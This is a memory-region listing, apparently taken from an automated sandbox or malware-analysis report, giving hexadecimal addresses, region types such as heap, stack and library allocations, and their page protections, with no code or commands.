page read and write
|
||
6303000
|
heap
|
page read and write
|
||
51B0000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
AC68000
|
heap
|
page read and write
|
||
ABB0000
|
heap
|
page read and write
|
||
305A000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
622C000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
797D000
|
stack
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6308000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
7230000
|
trusted library allocation
|
page execute and read and write
|
||
857D000
|
stack
|
page read and write
|
||
AD22000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
4DB0000
|
trusted library allocation
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
29AC000
|
heap
|
page read and write
|
||
6308000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7590000
|
heap
|
page execute and read and write
|
||
6303000
|
heap
|
page read and write
|
||
AA60000
|
trusted library allocation
|
page execute and read and write
|
||
3300000
|
heap
|
page read and write
|
||
308D000
|
heap
|
page read and write
|
||
4E2F000
|
stack
|
page read and write
|
||
6C1E000
|
trusted library allocation
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
AE9D000
|
heap
|
page read and write
|
||
7AF0000
|
trusted library allocation
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
5070000
|
heap
|
page execute and read and write
|
||
7A0E000
|
stack
|
page read and write
|
||
4E10000
|
trusted library allocation
|
page read and write
|
||
4E40000
|
heap
|
page readonly
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
8810000
|
heap
|
page read and write
|
||
8A93000
|
heap
|
page read and write
|
||
ADF6000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
4D40000
|
trusted library section
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
7930000
|
trusted library allocation
|
page execute and read and write
|
||
7A3D000
|
stack
|
page read and write
|
||
52D0000
|
heap
|
page readonly
|
||
AC6B000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
51D6000
|
trusted library allocation
|
page read and write
|
||
ABB1000
|
heap
|
page read and write
|
||
52BA000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
ADC9000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
51C0000
|
heap
|
page read and write
|
||
3111000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7AC0000
|
trusted library allocation
|
page read and write
|
||
6089000
|
trusted library allocation
|
page read and write
|
||
AC64000
|
heap
|
page read and write
|
||
4F60000
|
trusted library allocation
|
page read and write
|
||
6307000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
4ECC000
|
stack
|
page read and write
|
||
A9A2000
|
heap
|
page read and write
|
||
3320000
|
heap
|
page read and write
|
||
4E2D000
|
trusted library allocation
|
page execute and read and write
|
||
6303000
|
heap
|
page read and write
|
||
7E70000
|
trusted library allocation
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
AD20000
|
heap
|
page read and write
|
||
7370000
|
heap
|
page read and write
|
||
ABC5000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
AC57000
|
heap
|
page read and write
|
||
89F0000
|
trusted library allocation
|
page execute and read and write
|
||
6303000
|
heap
|
page read and write
|
||
728E000
|
stack
|
page read and write
|
||
7A70000
|
trusted library allocation
|
page read and write
|
||
AC5D000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
88F9000
|
heap
|
page read and write
|
||
7A60000
|
trusted library allocation
|
page read and write
|
||
2F00000
|
heap
|
page read and write
|
||
72CA000
|
stack
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
75C0000
|
trusted library allocation
|
page read and write
|
||
AD1D000
|
heap
|
page read and write
|
||
7F00000
|
trusted library allocation
|
page read and write
|
||
ACDF000
|
heap
|
page read and write
|
||
ABB0000
|
heap
|
page read and write
|
||
75DE000
|
stack
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
4D6D000
|
trusted library allocation
|
page execute and read and write
|
||
ABB4000
|
heap
|
page read and write
|
||
764F000
|
stack
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
2E78000
|
stack
|
page read and write
|
||
7BB4000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
A5DC000
|
heap
|
page read and write
|
||
7EB0000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
78C0000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
4B2E000
|
stack
|
page read and write
|
||
52E0000
|
trusted library allocation
|
page execute and read and write
|
||
6303000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
734B000
|
stack
|
page read and write
|
||
A723000
|
heap
|
page read and write
|
||
ABB0000
|
heap
|
page read and write
|
||
8910000
|
trusted library allocation
|
page read and write
|
||
AF1C000
|
heap
|
page read and write
|
||
AD47000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6D20000
|
trusted library allocation
|
page read and write
|
||
5401000
|
trusted library allocation
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
9A20000
|
trusted library allocation
|
page read and write
|
||
7DDE000
|
stack
|
page read and write
|
||
ACFF000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
BA91000
|
trusted library allocation
|
page read and write
|
||
772F000
|
stack
|
page read and write
|
||
7B32000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
4EA2000
|
trusted library allocation
|
page read and write
|
||
2870000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
74CE000
|
stack
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
AD11000
|
heap
|
page read and write
|
||
748D000
|
stack
|
page read and write
|
||
AC6B000
|
heap
|
page read and write
|
||
ABB1000
|
heap
|
page read and write
|
||
63C1000
|
trusted library allocation
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
ABB1000
|
heap
|
page read and write
|
||
748E000
|
stack
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
750E000
|
stack
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
2E3C000
|
stack
|
page read and write
|
||
8ABC000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
31E0000
|
heap
|
page read and write
|
||
76EE000
|
stack
|
page read and write
|
||
AC70000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
8867000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
AA99000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
356E000
|
stack
|
page read and write
|
||
88B2000
|
heap
|
page read and write
|
||
7AE5000
|
heap
|
page read and write
|
||
84E0000
|
heap
|
page read and write
|
||
2A39000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7E50000
|
trusted library allocation
|
page read and write
|
||
A641000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
ADD8000
|
heap
|
page read and write
|
||
ABB8000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
CC49000
|
trusted library allocation
|
page read and write
|
||
28C0000
|
heap
|
page read and write
|
||
758E000
|
stack
|
page read and write
|
||
7CC0000
|
trusted library allocation
|
page read and write
|
||
70BD000
|
stack
|
page read and write
|
||
7B38000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
4D8A000
|
trusted library allocation
|
page execute and read and write
|
||
6309000
|
heap
|
page read and write
|
||
52F0000
|
heap
|
page execute and read and write
|
||
6310000
|
heap
|
page read and write
|
||
A7B1000
|
heap
|
page read and write
|
||
6308000
|
heap
|
page read and write
|
||
33B8000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
3298000
|
stack
|
page read and write
|
||
ABB4000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
AC82000
|
heap
|
page read and write
|
||
C491000
|
trusted library allocation
|
page read and write
|
||
ABCD000
|
heap
|
page read and write
|
||
6307000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
666E000
|
trusted library allocation
|
page read and write
|
||
AC49000
|
heap
|
page read and write
|
||
4DFE000
|
stack
|
page read and write
|
||
7B3B000
|
heap
|
page read and write
|
||
7ACD000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
AD36000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
53DC000
|
stack
|
page read and write
|
||
7A90000
|
trusted library allocation
|
page read and write
|
||
EBF1000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
880E000
|
stack
|
page read and write
|
||
7854000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7E30000
|
trusted library allocation
|
page read and write
|
||
3028000
|
heap
|
page read and write
|
||
4D70000
|
trusted library allocation
|
page read and write
|
||
ADB5000
|
heap
|
page read and write
|
||
A441000
|
trusted library allocation
|
page read and write
|
||
6308000
|
heap
|
page read and write
|
||
49BD000
|
stack
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
60A9000
|
trusted library allocation
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
8EEC000
|
stack
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
78A0000
|
trusted library allocation
|
page execute and read and write
|
||
6309000
|
heap
|
page read and write
|
||
ACF3000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
CACE000
|
stack
|
page read and write
|
||
ADB9000
|
heap
|
page read and write
|
||
4D95000
|
trusted library allocation
|
page execute and read and write
|
||
AD9B000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
4E3F000
|
stack
|
page read and write
|
||
9A41000
|
trusted library allocation
|
page read and write
|
||
3310000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
AC76000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
AE8C000
|
heap
|
page read and write
|
||
AC50000
|
heap
|
page read and write
|
||
7AB0000
|
trusted library allocation
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
7CC9000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
33F6000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7E90000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
AC70000
|
heap
|
page read and write
|
||
7B21000
|
heap
|
page read and write
|
||
ABB3000
|
heap
|
page read and write
|
||
ABB1000
|
heap
|
page read and write
|
||
497C000
|
stack
|
page read and write
|
||
7A9D000
|
heap
|
page read and write
|
||
ABB4000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
595A000
|
trusted library allocation
|
page read and write
|
||
2EF0000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6C8E000
|
trusted library allocation
|
page read and write
|
||
AE98000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6308000
|
heap
|
page read and write
|
||
529E000
|
stack
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6081000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
AE35000
|
heap
|
page read and write
|
||
A8D0000
|
heap
|
page read and write
|
||
ACD6000
|
heap
|
page read and write
|
||
AD33000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7352000
|
heap
|
page read and write
|
||
CD9F000
|
trusted library allocation
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
AC43000
|
heap
|
page read and write
|
||
AC48000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
2950000
|
heap
|
page read and write
|
||
70FE000
|
stack
|
page read and write
|
||
33B0000
|
heap
|
page read and write
|
||
ABB1000
|
heap
|
page read and write
|
||
776D000
|
stack
|
page read and write
|
||
7870000
|
trusted library allocation
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
85BE000
|
stack
|
page read and write
|
||
AD17000
|
heap
|
page read and write
|
||
4C7E000
|
stack
|
page read and write
|
||
4FEE000
|
stack
|
page read and write
|
||
84F0000
|
trusted library allocation
|
page execute and read and write
|
||
AD21000
|
heap
|
page read and write
|
||
4E60000
|
trusted library allocation
|
page read and write
|
||
6307000
|
heap
|
page read and write
|
||
ABB5000
|
heap
|
page read and write
|
||
AC89000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
7E80000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
49D0000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
A7B1000
|
heap
|
page read and write
|
||
ACD5000
|
heap
|
page read and write
|
||
8AC1000
|
heap
|
page read and write
|
||
319E000
|
stack
|
page read and write
|
||
AD32000
|
heap
|
page read and write
|
||
AD48000
|
heap
|
page read and write
|
||
CB11000
|
trusted library allocation
|
page read and write
|
||
52C0000
|
trusted library allocation
|
page read and write
|
||
33A0000
|
trusted library section
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
7220000
|
trusted library allocation
|
page read and write
|
||
4D86000
|
trusted library allocation
|
page execute and read and write
|
||
6310000
|
heap
|
page read and write
|
||
4D7D000
|
trusted library allocation
|
page execute and read and write
|
||
550E000
|
stack
|
page read and write
|
||
AD8E000
|
heap
|
page read and write
|
||
E511000
|
trusted library allocation
|
page read and write
|
||
AD1F000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
ABBB000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
CB61000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
A855000
|
heap
|
page read and write
|
||
7CB0000
|
trusted library allocation
|
page read and write
|
||
ABB0000
|
heap
|
page read and write
|
||
5081000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
3020000
|
heap
|
page read and write
|
||
35AE000
|
stack
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
ABB7000
|
heap
|
page read and write
|
||
B491000
|
trusted library allocation
|
page read and write
|
||
ABB2000
|
heap
|
page read and write
|
||
33BF000
|
heap
|
page read and write
|
||
AC5A000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
76AA000
|
stack
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
4F6B000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
452000
|
remote allocation
|
page execute and read and write
|
||
85D0000
|
trusted library allocation
|
page execute and read and write
|
||
4E20000
|
trusted library allocation
|
page read and write
|
||
6429000
|
trusted library allocation
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
AD47000
|
heap
|
page read and write
|
||
9411000
|
trusted library allocation
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
4E39000
|
trusted library allocation
|
page read and write
|
||
8A80000
|
heap
|
page read and write
|
||
4EF8000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
71F0000
|
trusted library allocation
|
page read and write
|
||
6401000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
88BA000
|
heap
|
page read and write
|
||
51CD000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6308000
|
heap
|
page read and write
|
||
31DE000
|
stack
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
8900000
|
trusted library allocation
|
page execute and read and write
|
||
8A35000
|
trusted library allocation
|
page read and write
|
||
ACD6000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
74CB000
|
stack
|
page read and write
|
||
71D0000
|
trusted library allocation
|
page read and write
|
||
ACE7000
|
heap
|
page read and write
|
||
52BF000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
AC6A000
|
heap
|
page read and write
|
||
AA70000
|
trusted library allocation
|
page read and write
|
||
330E000
|
heap
|
page read and write
|
||
3104000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7201000
|
trusted library allocation
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
AC7C000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
4E70000
|
trusted library allocation
|
page execute and read and write
|
||
6309000
|
heap
|
page read and write
|
||
53E0000
|
trusted library allocation
|
page read and write
|
||
ABB9000
|
heap
|
page read and write
|
||
6CE1000
|
trusted library allocation
|
page read and write
|
||
2C5F000
|
unkown
|
page read and write
|
||
ACF7000
|
heap
|
page read and write
|
||
595C000
|
trusted library allocation
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
AD11000
|
heap
|
page read and write
|
||
4D80000
|
trusted library allocation
|
page read and write
|
||
77FB000
|
heap
|
page read and write
|
||
ABB4000
|
heap
|
page read and write
|
||
AC7B000
|
heap
|
page read and write
|
||
6308000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
77AB000
|
stack
|
page read and write
|
||
8500000
|
trusted library allocation
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
88C6000
|
heap
|
page read and write
|
||
7350000
|
heap
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
AE3E000
|
heap
|
page read and write
|
||
730E000
|
stack
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
77FE000
|
stack
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
AC51000
|
heap
|
page read and write
|
||
AA91000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
7B4F000
|
heap
|
page read and write
|
||
304A000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
ABB2000
|
heap
|
page read and write
|
||
7B40000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
52C4000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
A8AA000
|
heap
|
page read and write
|
||
4E5B000
|
heap
|
page read and write
|
||
8ABA000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
8EF0000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
7240000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7EE0000
|
trusted library allocation
|
page read and write
|
||
AC6D000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6228000
|
trusted library allocation
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
7920000
|
trusted library allocation
|
page execute and read and write
|
||
A5BE000
|
heap
|
page read and write
|
||
85E0000
|
trusted library allocation
|
page execute and read and write
|
||
52C8000
|
trusted library allocation
|
page read and write
|
||
ABBE000
|
heap
|
page read and write
|
||
84C4000
|
stack
|
page read and write
|
||
EBA3000
|
trusted library allocation
|
page read and write
|
||
ABB6000
|
heap
|
page read and write
|
||
ABB1000
|
heap
|
page read and write
|
||
AC6E000
|
heap
|
page read and write
|
||
85C0000
|
heap
|
page read and write
|
||
7F10000
|
trusted library allocation
|
page read and write
|
||
ABB2000
|
heap
|
page read and write
|
||
71CB000
|
stack
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
4DD0000
|
heap
|
page read and write
|
||
AC94000
|
heap
|
page read and write
|
||
ABB1000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
AA80000
|
trusted library allocation
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
ADE5000
|
heap
|
page read and write
|
||
AC5C000
|
heap
|
page read and write
|
||
AE39000
|
heap
|
page read and write
|
||
ABB6000
|
heap
|
page read and write
|
||
3405000
|
heap
|
page read and write
|
||
60E8000
|
trusted library allocation
|
page read and write
|
||
AD55000
|
heap
|
page read and write
|
||
7AD0000
|
trusted library allocation
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
DB11000
|
trusted library allocation
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
AC72000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
AD5E000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
301E000
|
stack
|
page read and write
|
||
ACD6000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
AC43000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
ACF1000
|
heap
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
537E000
|
stack
|
page read and write
|
||
718D000
|
stack
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7B4B000
|
stack
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
AA40000
|
trusted library allocation
|
page execute and read and write
|
||
788E000
|
stack
|
page read and write
|
||
487E000
|
stack
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
53F0000
|
heap
|
page read and write
|
||
49F0000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
ADD4000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
AD4C000
|
heap
|
page read and write
|
||
ABC5000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
AC52000
|
heap
|
page read and write
|
||
A649000
|
heap
|
page read and write
|
||
760E000
|
stack
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
7D9E000
|
stack
|
page read and write
|
||
4C2F000
|
stack
|
page read and write
|
||
7880000
|
heap
|
page execute and read and write
|
||
AD3E000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
5035000
|
heap
|
page execute and read and write
|
||
4E30000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7A80000
|
trusted library allocation
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
4E50000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
4F4A000
|
trusted library allocation
|
page read and write
|
||
4E67000
|
trusted library allocation
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
ADA9000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
52A2000
|
trusted library allocation
|
page read and write
|
||
25FB000
|
stack
|
page read and write
|
||
88F0000
|
heap
|
page read and write
|
||
4E9E000
|
trusted library allocation
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
AC48000
|
heap
|
page read and write
|
||
AE44000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
4D82000
|
trusted library allocation
|
page read and write
|
||
ACE3000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
9A30000
|
trusted library allocation
|
page execute and read and write
|
||
6409000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
7E60000
|
trusted library allocation
|
page read and write
|
||
5CC8000
|
trusted library allocation
|
page read and write
|
||
AC44000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
ADBA000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
CDF1000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
AC70000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
28BE000
|
unkown
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
2A3B000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
7BA0000
|
heap
|
page read and write
|
||
7EC0000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
29D8000
|
heap
|
page read and write
|
||
AE13000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
A649000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
AD6F000
|
heap
|
page read and write
|
||
783A000
|
stack
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
ABB8000
|
heap
|
page read and write
|
||
AD1A000
|
heap
|
page read and write
|
||
EB88000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
AC61000
|
heap
|
page read and write
|
||
7CB6000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
9A10000
|
trusted library allocation
|
page read and write
|
||
AD7E000
|
heap
|
page read and write
|
||
57A5000
|
trusted library allocation
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
52A0000
|
trusted library allocation
|
page read and write
|
||
4E50000
|
trusted library allocation
|
page read and write
|
||
8920000
|
trusted library allocation
|
page read and write
|
||
7E40000
|
trusted library allocation
|
page execute and read and write
|
||
89D0000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
7A7F000
|
heap
|
page read and write
|
||
8A9C000
|
heap
|
page read and write
|
||
AC56000
|
heap
|
page read and write
|
||
7B90000
|
heap
|
page execute and read and write
|
||
7B00000
|
trusted library allocation
|
page read and write
|
||
6307000
|
heap
|
page read and write
|
||
4F20000
|
trusted library allocation
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
898D000
|
stack
|
page read and write
|
||
4CDE000
|
stack
|
page read and write
|
